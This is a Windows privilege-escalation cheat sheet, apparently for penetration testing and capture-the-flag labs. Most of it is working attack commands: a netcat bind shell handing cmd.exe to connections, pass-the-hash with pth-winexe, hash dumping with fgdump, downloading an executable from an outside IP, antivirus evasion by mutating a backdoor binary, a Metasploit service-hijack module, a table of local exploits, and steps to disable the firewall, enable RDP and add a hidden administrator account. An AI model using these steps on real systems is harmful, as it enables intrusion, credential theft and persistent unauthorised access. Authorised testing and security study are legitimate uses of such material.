Windows elevation of privileges

Getting a shell (C, e.g. from an exploit payload; /k keeps the window open after $cmd has run)

$ system("start cmd.exe /k $cmd")

Getting a bind shell with netcat (this is a listener on the target, not a reverse shell: -L keeps listening after a client disconnects and -e hands the connection to cmd.exe; connect to it from the attacker box with nc $ip 31337. For a reverse shell, drop -L/-p and pass the attacker's host and port instead so the target connects back.)

$ nc -Lp 31337 -vv -e cmd.exe

Find installed patches, architecture, OS version

$ systeminfo

Hostname.

$ hostname

Find current user.

$ echo %username%

List all users

$ net users

Information about a user

$ net users Administrator

Network information

$ ipconfig /all & route print & arp -a

List open connections

$ netstat -aton

Firewall information

$ netsh firewall show state
$ netsh firewall show config

(The netsh firewall context is the XP/2003 syntax; Vista and later keep it only for compatibility and use the advfirewall context instead.)

List scheduled tasks

$ schtasks /query /fo LIST /v

List windows services

$ net start
$ wmic service list brief

Get permissions of the binaries behind all non-system32 services. The first loop collects each service's PathName from wmic, the second runs icacls on each path (the odd eol/delims quoting strips the surrounding double quotes). A binary that grants *BUILTIN\Users* (or Everyone / Authenticated Users) (F), (M) or (W) can be replaced with a malicious one that then runs with the service account, usually SYSTEM, at the next service start or reboot. Note that icacls only shows the file ACL; it does not tell you whether the service object itself is reconfigurable (sc sdshow) or whether the path is unquoted.

$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
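The same check done in PowerShell, as an added example that is not part of the original cheat sheet: it enumerates service command lines, resolves the executable (quoted or unquoted), skips system32 like the cmd loop above, then reads each binary's ACL and reports any write-capable right held by a low-privileged principal, plus unquoted paths containing spaces. It assumes PowerShell 3 or later (for Get-CimInstance) and the English names of the built-in groups; adjust $lowPrivPrincipals on localized systems.

```powershell
# Added example, not from the original cheat sheet.
# Flags service binaries outside system32 that a low-privileged principal can
# write to, plus unquoted service paths containing spaces.
# Assumes PowerShell 3+ (Get-CimInstance) and English built-in group names.

$lowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any one of these on the binary is enough to swap it for a malicious one.
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions
# Installer-written ACLs sometimes use generic rights, which Get-Acl shows as
# raw numbers: GENERIC_ALL (0x10000000) and GENERIC_WRITE (0x40000000).
$genericWrite = 0x10000000 -bor 0x40000000

function Get-ServiceImagePath {
    # Extract the executable from a service command line, whether it is
    # quoted ("C:\Program Files\x\svc.exe" -arg) or unquoted (C:\x\svc.exe -arg).
    param([string]$CommandLine)
    if ($CommandLine.StartsWith('"')) {
        $end = $CommandLine.IndexOf('"', 1)
        if ($end -gt 1) { return $CommandLine.Substring(1, $end - 1) }
        return $null
    }
    $m = [regex]::Match($CommandLine, '^(.+?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($CommandLine -split ' ')[0]
}

function Find-WeakServiceBinaries {
    $system32 = Join-Path $env:SystemRoot 'system32'
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceImagePath $svc.PathName
        if (-not $exe) { continue }
        # Same filter as the cmd loop above: ignore Windows' own binaries.
        if ($exe.StartsWith($system32, [System.StringComparison]::OrdinalIgnoreCase)) { continue }

        # Unquoted path with spaces: the service manager tries C:\Program.exe,
        # C:\Program Files\Vendor.exe, ... before the real binary.
        if (-not $svc.PathName.StartsWith('"') -and $exe.Contains(' ')) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Path      = $exe
                Principal = ''
                Finding   = 'Unquoted service path with spaces'
            }
        }

        if (-not (Test-Path -LiteralPath $exe)) { continue }
        $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            $rights = [int]$ace.FileSystemRights
            if ((($rights -band [int]$writeRights) -eq 0) -and (($rights -band $genericWrite) -eq 0)) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Path      = $exe
                Principal = $ace.IdentityReference.Value
                Finding   = "Binary writable ($($ace.FileSystemRights))"
            }
        }
    }
}

Find-WeakServiceBinaries | Format-Table -AutoSize
```

Reading ACLs needs no elevation, so this runs from the low-privileged shell you are trying to escalate from. It checks only the binary itself; a writable parent directory of an unquoted path is reported as a finding but its ACL is not inspected, and the service object's own DACL (which the Metasploit module further down also abuses) still has to be checked separately.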

Pass the hash allows an attacker to authenticate to a remote target with a valid username and NTLM/LM hash instead of the cleartext password. pth-winexe takes the hash in the password position as LMHASH:NTHASH; when only the NT hash is known, use the empty-LM value aad3b435b51404eeaad3b435b51404ee for the LM half.

$ pth-winexe -U 'user%LMHASH:NTHASH' //$ip cmd

Dump local password hashes (needs local administrator rights; writes a .pwdump file in the current directory)

$ fgdump.exe

If powershell.exe is blocked (e.g. by AppLocker), nps ("Not PowerShell") runs PowerShell code through the System.Management.Automation assembly from its own executable instead:

https://github.com/Ben0xA/nps

Downloading files in Windows (PowerShell; from cmd.exe wrap it as powershell -c "..."):

(new-object System.Net.WebClient).DownloadFile('http://1.1.1.1/file.exe','C:\Users\Administrator\Desktop\file.exe')

Once you know which updates are installed (the Hotfix(s) section of systeminfo), windows-exploit-suggester can compare them against the Microsoft bulletin database (fetched with --update) and list missing patches that have known exploits; feed it the saved systeminfo output with --systeminfo. The run below uses the other mode, --patches, which only lists the KB numbers shipped for one bulletin:

$ ./windows-exploit-suggester.py -d 2017-02-09-mssb.xls -p ms16-075
[*] initiating winsploit version 3.2...
[*] database file detected as xls or xlsx based on extension
[*] searching all kb's for bulletin id MS16-075
[+] relevant kbs ['3164038', '3163018', '3163017', '3161561']
[*] done

AV bypass

Generating a mutated binary to bypass antiviruses

$ wine hyperion.exe ../backdoor.exe ../backdoor_mutation.exe

Metasploit

Module to elevate privileges to SYSTEM by creating a service or hijacking an existing one with weak permissions (the same service/binary permission issue checked with icacls above; it runs against an existing session):

msf > use exploit/windows/local/service_permissions

Other scripts

https://github.com/GDSSecurity/Windows-Exploit-Suggester
https://github.com/Jean13/Penetration_Testing/blob/master/Privilege_Escalation/windows-privesc-check2.exe

Updates & exploits

Exploit-DB ID, affected component, the MS bulletin that fixed it, and the service packs affected on each Windows version.

Exploit-DB  Vuln name              MS#        2K         XP       2003      2008          Vista     7
271         Lsasrv.dll             MS04-011   SP2/3/4    SP0/1    -         -             -         -
350         Util Manager           MS04-019   SP2/3/4    -        -         -             -         -
351         POSIX                  MS04-020   SP4        -        -         -             -         -
352         Univ lang. Util Mgr    MS04-019   SP2/3/4    -        -         -             -         -
355         Univ lang. Util Mgr    MS04-019   SP2/3/4    -        -         -             -         -
1149        PnP Service            MS05-039   SP4        SP2      SP1       -             -         -
1197        keybd_event            -          all        all      all       -             -         -
1198        CSRSS                  MS05-018   SP3/4      SP1/2    -         -             -         -
1407        Kernel APC             MS05-055   SP4        -        -         -             -         -
1911        Mrxsmb.sys             MS06-030   all        SP2      -         -             -         -
2412        Windows Kernel         MS06-049   SP4        -        -         -             -         -
3220        Print spool service    -          -          All      -         -             -         -
5518        win32k.sys             MS08-025   SP4        SP2      SP1/SP2   SP0           SP0/SP1   -
6705        Churrasco              MS09-012   -          -        All       -             -         -
6705        Churraskito            -          -          All      All       -             -         -
21923       Winlogon NetDDE        -          All        All      -         -             -         -
11199       KiTrap0D/vdmallowed    MS10-015   All        All      All       All           All       All
14610       Chimichurri            MS10-059   -          -        -         All           All       SP0
15589       Task Scheduler         MS10-092   -          -        -         SP0/SP1/SP2   SP1/SP2   SP0
18176       AFD.Sys                MS11-080   -          SP3      SP3       -             -         -
100         RPC DCOM Long File     MS03-026   SP3/4      -        -         -             -         -
103         RPC2                   MS03-039   all (CN)   -        -         -             -         -
109         RPC2                   MS03-039   all        -        -         -             -         -
119         Netapi                 MS03-049   SP4        -        -         -             -         -
3022        ASN.1                  MS04-007   SP2/3/4    SP0/1    -         -             -         -
275         SSL BOF                MS04-011   SP4        ?        -         -             -         -
295         Lsasarv.dll            MS04-011   SP2/3/4    SP0/1    -         -             -         -
734         NetDDE BOF             MS04-031   SP2/3/4    SP0/1    -         -             -         -
1075        Messaging Queue        MS05-017   SP3/4      SP0/1    -         -             -         -
1149        PnP Service            MS05-039   SP4        -        -         -             -         -
2223        Canonicalize Pathname  MS06-040   -          SP1      -         -             -         -
2265        NetIPSRemote           MS06-040   SP0-4      SP0/1    -         -             -         -
2789        NetPManageIPCConn      MS06-070   SP4        -        -         -             -         -
7104        Service Code Exec      MS08-067   SP4        SP2/3    SP1/2     SP0           SP0/1     -
7132        Service Code Exec      MS08-067   SP4        -        SP2       -             -         -
14674       SRV2.SYS SMB           MS09-050   -          -        -         -             SP1/2     -

Useful commands

Enable RDP access

$ reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
$ netsh firewall set service remoteadmin enable
$ netsh firewall set service remotedesktop enable

Disable firewall

$ netsh firewall set opmode disable

Add a new user

$ net user test 1234 /add
$ net localgroup administrators test /add

Get proof

$ echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Users\Administrator\Desktop\proof.txt" 2> nul & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 2> nul & type %USERPROFILE%\Desktop\proof.txt 2> nul